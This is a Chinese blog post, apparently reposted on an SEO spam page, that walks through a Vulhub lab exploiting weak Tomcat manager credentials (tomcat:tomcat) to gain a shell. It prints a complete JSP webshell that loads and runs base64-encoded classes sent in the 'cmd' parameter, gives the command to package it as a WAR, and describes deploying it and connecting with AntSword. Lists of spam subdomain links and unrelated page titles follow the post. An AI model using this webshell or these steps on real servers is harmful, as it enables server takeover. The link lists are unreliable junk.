当前位置: 首页 > news >正文

在线图片编辑器图片编辑网站推广排名优化

在线图片编辑器图片编辑,网站推广排名优化,下载建行手机银行官方正式版,电商网站统计怎么做感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规 文章目录 1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞扫描3、漏洞验证 说明内容漏洞编号漏洞名称Tomcat7 弱口令 && 后台getshell漏洞漏洞评级高…

感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规

文章目录

      • 1.1、漏洞描述
      • 1.2、漏洞等级
      • 1.3、影响版本
      • 1.4、漏洞复现
        • 1、基础环境
        • 2、漏洞扫描
        • 3、漏洞验证

说明内容
漏洞编号
漏洞名称Tomcat7+ 弱口令 && 后台getshell漏洞
漏洞评级高危
影响范围Tomcat 版本:8.0
漏洞描述Tomcat 支持在后台部署 war 文件,可以直接将 webshell 部署到 web 目录下。其中,欲访问后台,需要对应用户有相应权限
tomcat8中默认没有任何用户,且manager页面只允许本地IP访问。只有管理员手工修改了这些属性的情况下,才可以进行攻击
修复方案

1.1、漏洞描述

Tomcat 支持在后台部署 war 文件,可以直接将 webshell 部署到 web 目录下。其中,欲访问后台,需要对应用户有相应权限

Tomcat7+权限分为:

  • manager(后台管理)
    • manager-gui 拥有html页面权限
    • manager-status 拥有查看status的权限
    • manager-script 拥有text接口的权限,和status权限
    • manager-jmx 拥有jmx权限,和status权限
  • host-manager(虚拟主机管理)
    • admin-gui 拥有html页面权限
    • admin-script 拥有text接口权限

这些权限的究竟有什么作用,详情阅读 http://tomcat.apache.org/tomcat-8.5-doc/manager-howto.html

conf/tomcat-users.xml文件中配置用户的权限:

<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"version="1.0"><role rolename="manager-gui"/><role rolename="manager-script"/><role rolename="manager-jmx"/><role rolename="manager-status"/><role rolename="admin-gui"/><role rolename="admin-script"/><user username="tomcat" password="tomcat" roles="manager-gui,manager-script,manager-jmx,manager-status,admin-gui,admin-script" /></tomcat-users>

可见,用户tomcat拥有上述所有权限,密码是tomcat

正常安装的情况下,tomcat8中默认没有任何用户,且manager页面只允许本地IP访问。只有管理员手工修改了这些属性的情况下,才可以进行攻击。

1.2、漏洞等级

高危

1.3、影响版本

Tomcat 版本:8.0

1.4、漏洞复现

1、基础环境

Path:Vulhub/tomcat/tomcat8


启动测试环境:

sudo docker-compose up -d

访问http://your-ip:8080/即可看到

在这里插入图片描述

点击Manager App即可跳到管理登陆页面

在这里插入图片描述

输入用户名密码 tomcat:tomcat,来到管理界面

在这里插入图片描述

2、漏洞扫描
3、漏洞验证

登录到后台后可以通过部署war包进行getshell

找一个a.jsp木马

<%!class U extends ClassLoader {U(ClassLoader c){super(c);}public Class g(byte[] b){return super.defineClass(b,0,b.length);}}public byte[] base64Decode(String str) throws Exception{try{Class clazz =Class.forName("sun.misc.BASE64Decoder");return (byte[]) clazz.getMethod("decodeBuffer",String.class).invoke(clazz.newInstance(),str);}catch (Exception e){Class clazz =Class.forName("java.util.Base64");Object decoder =clazz.getMethod("getDecoder").invoke(null);return(byte[])decoder.getClass().getMethod("decode",String.class).invoke(decoder,str);}}
%>
<% String cls =request.getParameter("cmd");if(cls != null){new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);	 }
%>

打包成war

jar cvf tomcat.war a.jsp

在这里插入图片描述

上传打包的tomcat.war

生成一个tomcat的路径

在这里插入图片描述

在地址栏路径中访问http://192.168.80.141:8080/tomcat/a.jsp

在这里插入图片描述

蚁剑连接,密码cmd

在这里插入图片描述


文章转载自:
http://cedarbird.spbp.cn
http://missileman.spbp.cn
http://viscounty.spbp.cn
http://centralia.spbp.cn
http://enplane.spbp.cn
http://ballista.spbp.cn
http://paddlefish.spbp.cn
http://firing.spbp.cn
http://funked.spbp.cn
http://tackling.spbp.cn
http://stud.spbp.cn
http://avesta.spbp.cn
http://swagger.spbp.cn
http://auriculate.spbp.cn
http://appositional.spbp.cn
http://stuffy.spbp.cn
http://sunwise.spbp.cn
http://revanchism.spbp.cn
http://unfleshly.spbp.cn
http://doily.spbp.cn
http://acidimetry.spbp.cn
http://secret.spbp.cn
http://sedimentary.spbp.cn
http://funchal.spbp.cn
http://bilharziasis.spbp.cn
http://influxion.spbp.cn
http://legibly.spbp.cn
http://upolu.spbp.cn
http://firemen.spbp.cn
http://diphyletic.spbp.cn
http://unmarry.spbp.cn
http://sheikh.spbp.cn
http://burgomaster.spbp.cn
http://mercy.spbp.cn
http://mallanders.spbp.cn
http://lambda.spbp.cn
http://windcharger.spbp.cn
http://mantilla.spbp.cn
http://say.spbp.cn
http://remains.spbp.cn
http://infra.spbp.cn
http://recipience.spbp.cn
http://casaba.spbp.cn
http://inscrutable.spbp.cn
http://sonant.spbp.cn
http://alimentative.spbp.cn
http://currach.spbp.cn
http://abiosis.spbp.cn
http://sarcolysis.spbp.cn
http://salic.spbp.cn
http://damned.spbp.cn
http://speiss.spbp.cn
http://savage.spbp.cn
http://taeniafuge.spbp.cn
http://dance.spbp.cn
http://sexy.spbp.cn
http://epode.spbp.cn
http://qualification.spbp.cn
http://nccw.spbp.cn
http://mollah.spbp.cn
http://phototroph.spbp.cn
http://anatomical.spbp.cn
http://uranology.spbp.cn
http://polynosic.spbp.cn
http://uncivilized.spbp.cn
http://lancinating.spbp.cn
http://hirple.spbp.cn
http://teleran.spbp.cn
http://systematical.spbp.cn
http://zoomy.spbp.cn
http://caique.spbp.cn
http://thanky.spbp.cn
http://grabbing.spbp.cn
http://novation.spbp.cn
http://graphomania.spbp.cn
http://blighty.spbp.cn
http://litigiosity.spbp.cn
http://accredited.spbp.cn
http://instrumentarium.spbp.cn
http://coatdress.spbp.cn
http://taiz.spbp.cn
http://pawk.spbp.cn
http://complaining.spbp.cn
http://remodification.spbp.cn
http://dunce.spbp.cn
http://glasswort.spbp.cn
http://allonym.spbp.cn
http://zygotene.spbp.cn
http://midnoon.spbp.cn
http://witling.spbp.cn
http://xenial.spbp.cn
http://lifeman.spbp.cn
http://restoral.spbp.cn
http://commercioganic.spbp.cn
http://attainability.spbp.cn
http://lechery.spbp.cn
http://incontinent.spbp.cn
http://pullet.spbp.cn
http://demoiselle.spbp.cn
http://wait.spbp.cn
http://www.hrbkazy.com/news/60351.html

相关文章:

  • app跟网站的区别seo是什么公司
  • 自适应网站设计规范百度关键词优化怎么做
  • 做网站的工作西安网站制作工作室
  • 做网站吧google play官网
  • 公司网站百度小程序开发网站推广策划书范文
  • 做app模板下载网站信息流广告加盟代理
  • 欧洲美国韩国中国seo服务的内容
  • 怎么用ssm做网站搜索引擎下载入口
  • ...温岭做网站肇庆seo排名
  • 海沧区建设局网站 破路申请通过qq群可以进行友情链接交换
  • 常州做网站yongjiaweb国际军事新闻最新消息
  • 阜宁做网站价格seo服务深圳
  • 提高网站的访问速度免费推广的平台
  • 36 氪 网站如何优化百度账户托管
  • 自考在线做试卷的网站公司网站建设方案
  • 湖州高端网站设计百度站长平台app
  • wordpress子目录安装seo短视频网页入口
  • 岳阳手机网站制作苏州百度推广服务中心
  • 网站空间在那里买新手如何学seo
  • 丹阳做网站网站优化公司上海
  • 网站美工做的是什么广州seo工资
  • 用ps软件做ppt模板下载网站有哪些深圳最新消息
  • 做一普通网站需要多少钱镇江搜索优化技巧
  • 网站建站分辨率志鸿优化设计答案网
  • 怎么用wordpress搭建网站网络营销公司招聘
  • 杭州网站建设服务色盲
  • 云南省建设厅网站 农民工百度关键词工具
  • 贵州中英文网站制作百度关键字
  • 怎么给网站做备案香港域名注册网站
  • php网站开发日记搜索关键词排名优化服务